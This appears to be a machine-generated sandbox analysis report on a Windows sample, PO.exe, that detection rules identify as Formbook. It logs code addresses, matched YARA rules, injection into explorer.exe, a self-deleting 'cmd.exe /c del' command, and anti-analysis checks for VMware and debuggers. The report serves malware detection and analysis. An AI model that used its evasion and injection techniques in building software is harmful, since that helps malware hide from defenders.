Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B025DD	1_2_00B025DD
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A30D20	1_2_00A30D20
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B02D07	1_2_00B02D07
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B01D55	1_2_00B01D55
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B02EF7	1_2_00B02EF7
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A56E30	1_2_00A56E30
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AFD616	1_2_00AFD616
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B01FF1	1_2_00B01FF1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00B0DFCE	1_2_00B0DFCE
Source: C:\Windows\explorer.exe	Code function: 3_2_06D52A52	3_2_06D52A52
Source: C:\Windows\explorer.exe	Code function: 3_2_06D4ACF2	3_2_06D4ACF2
Source: C:\Windows\explorer.exe	Code function: 3_2_06D4ACE9	3_2_06D4ACE9
Source: C:\Windows\explorer.exe	Code function: 3_2_06D51882	3_2_06D51882
Source: C:\Windows\explorer.exe	Code function: 3_2_06D49072	3_2_06D49072
Source: C:\Windows\explorer.exe	Code function: 3_2_06D49069	3_2_06D49069
Source: C:\Windows\explorer.exe	Code function: 3_2_06D55A0C	3_2_06D55A0C
Source: C:\Windows\explorer.exe	Code function: 3_2_06D50152	3_2_06D50152
Source: C:\Windows\explorer.exe	Code function: 3_2_06D4DB1F	3_2_06D4DB1F
Source: C:\Windows\explorer.exe	Code function: 3_2_06D4DB22	3_2_06D4DB22
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBB090	10_2_04CBB090
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD20A0	10_2_04CD20A0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D720A8	10_2_04D720A8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D61002	10_2_04D61002
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CB841F	10_2_04CB841F
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CBD5E0	10_2_04CBD5E0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CD2581	10_2_04CD2581
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D71D55	10_2_04D71D55
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CAF900	10_2_04CAF900
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D72D07	10_2_04D72D07
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CA0D20	10_2_04CA0D20
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC4120	10_2_04CC4120
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D72EF7	10_2_04D72EF7
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D722AE	10_2_04D722AE
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CC6E30	10_2_04CC6E30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D71FF1	10_2_04D71FF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CDEBB0	10_2_04CDEBB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04D72B28	10_2_04D72B28
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AE1EC	10_2_008AE1EC
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AE1F8	10_2_008AE1F8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AEADA	10_2_008AEADA
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_00892D90	10_2_00892D90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_00899E3D	10_2_00899E3D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_00899E40	10_2_00899E40
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_00892FB0	10_2_00892FB0

Source: C:\Windows\SysWOW64\explorer.exe	Code function: String function: 04CAB150 appears 35 times
Source: C:\Users\user\Desktop\PO.exe	Code function: String function: 00A3B150 appears 45 times

Source: PO.exe, 00000000.00000003.234946045.000000001EF76000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
Source: PO.exe, 00000001.00000003.242100037.000000000098F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PO.exe
Source: PO.exe, 00000001.00000002.294578840.0000000002BFE000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameEXPLORER.EXEj% vs PO.exe

Source: PO.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.PO.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO.exe.2670000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.PO.exe.2670000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.PO.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/3@3/2

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004041E5

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,

0_2_004020A6

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4492:120:WilError_01

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Users\user\AppData\Local\Temp\nsoBF0C.tmp

Jump to behavior

Source: C:\Windows\explorer.exe

Process created: C:\Windows\SysWOW64\explorer.exe

Source: PO.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\PO.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: PO.exe

ReversingLabs: Detection: 16%

Source: C:\Users\user\Desktop\PO.exe

File read: C:\Users\user\Desktop\PO.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\PO.exe	Process created: C:\Users\user\Desktop\PO.exe 'C:\Users\user\Desktop\PO.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO.exe'	Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source:	Binary string: explorer.pdbUGP source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: PO.exe, 00000000.00000003.234541643.000000001EFF0000.00000004.00000001.sdmp, PO.exe, 00000001.00000002.293490936.0000000000B2F000.00000040.00000001.sdmp, explorer.exe, 0000000A.00000002.501687927.0000000004C80000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: PO.exe, explorer.exe
Source:	Binary string: C:\xampp\htdocs\Cryptor\1a839a6cf4cc488e888465f9ce8aa846\Loader\Loader\Release\d18g7xa93.pdb source: PO.exe, 00000000.00000002.242784001.0000000073352000.00000002.00020000.sdmp, 5t94xwjj.dll.0.dr
Source:	Binary string: explorer.pdb source: PO.exe, 00000001.00000002.294032142.00000000028B0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000003.00000002.511710561.0000000007260000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\PO.exe

Unpacked PE file: 1.2.PO.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,

0_2_00401FDC

Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041B828 push cs; ret	1_2_0041B82D
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041D0D2 push eax; ret	1_2_0041D0D8
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041D0DB push eax; ret	1_2_0041D142
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041D085 push eax; ret	1_2_0041D0D8
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041D13C push eax; ret	1_2_0041D142
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00418292 pushad ; retf	1_2_00418296
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00417C74 push ds; iretd	1_2_00417C94
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_0041E638 pushad ; ret	1_2_0041E63A
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00416740 push FFFFFF87h; retf	1_2_00416774
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A8D0D1 push ecx; ret	1_2_00A8D0E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_04CFD0D1 push ecx; ret	10_2_04CFD0E4
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AD085 push eax; ret	10_2_008AD0D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AD0DB push eax; ret	10_2_008AD142
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AD0D2 push eax; ret	10_2_008AD0D8
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AB828 push cs; ret	10_2_008AB82D
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AD13C push eax; ret	10_2_008AD142
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008A8292 pushad ; retf	10_2_008A8296
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008A7C74 push ds; iretd	10_2_008A7C94
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008AE638 pushad ; ret	10_2_008AE63A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_008A6740 push FFFFFF87h; retf	10_2_008A6774

Source: C:\Users\user\Desktop\PO.exe

File created: C:\Users\user\AppData\Local\Temp\nsjBF3C.tmp\5t94xwjj.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x80 0x0E 0xEB

Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PO.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\PO.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PO.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 00000000008998E4 second address: 00000000008998EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe	RDTSC instruction interceptor: First address: 0000000000899B5E second address: 0000000000899B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\PO.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Windows\explorer.exe TID: 1260	Thread sleep time: -58000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 6136	Thread sleep time: -44000s >= -30000s			Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	0_2_00405301
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,	0_2_00405C94
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_004026BC FindFirstFileA,	0_2_004026BC

Source: explorer.exe, 00000003.00000000.259578137.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000003.00000002.503553523.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000003.00000002.503675832.0000000003755000.00000004.00000001.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000002.503705754.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000002.503675832.0000000003755000.00000004.00000001.sdmp	Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000003.00000000.245750611.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000003.00000000.259630754.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000003.00000000.255125796.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.259630754.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: explorer.exe, 00000003.00000000.259320377.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\PO.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_00409A90 rdtsc

1_2_00409A90

Source: C:\Users\user\Desktop\PO.exe

Code function: 1_2_0040ACD0 LdrLoadDll,

1_2_0040ACD0

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_73351000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,

0_2_73351000

Source: C:\Users\user\Desktop\PO.exe

Code function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,

0_2_00401FDC

Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_0250165A mov eax, dword ptr fs:[00000030h]	0_2_0250165A
Source: C:\Users\user\Desktop\PO.exe	Code function: 0_2_02501872 mov eax, dword ptr fs:[00000030h]	0_2_02501872
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]	1_2_00A620A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]	1_2_00A620A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]	1_2_00A620A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]	1_2_00A620A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]	1_2_00A620A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A620A0 mov eax, dword ptr fs:[00000030h]	1_2_00A620A0
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A790AF mov eax, dword ptr fs:[00000030h]	1_2_00A790AF
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6F0BF mov ecx, dword ptr fs:[00000030h]	1_2_00A6F0BF
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6F0BF mov eax, dword ptr fs:[00000030h]	1_2_00A6F0BF
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A6F0BF mov eax, dword ptr fs:[00000030h]	1_2_00A6F0BF
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A39080 mov eax, dword ptr fs:[00000030h]	1_2_00A39080
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB3884 mov eax, dword ptr fs:[00000030h]	1_2_00AB3884
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00AB3884 mov eax, dword ptr fs:[00000030h]	1_2_00AB3884
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]	1_2_00A340E1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]	1_2_00A340E1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A340E1 mov eax, dword ptr fs:[00000030h]	1_2_00A340E1
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00A358EC mov eax, dword ptr fs:[00000030h]	1_2_00A358EC
Source: C:\Users\user\Desktop\PO.exe	Code function: 1_2_00ACB8D0 mov eax, dword ptr fs:[00000030h]	1_2_00ACB8D0
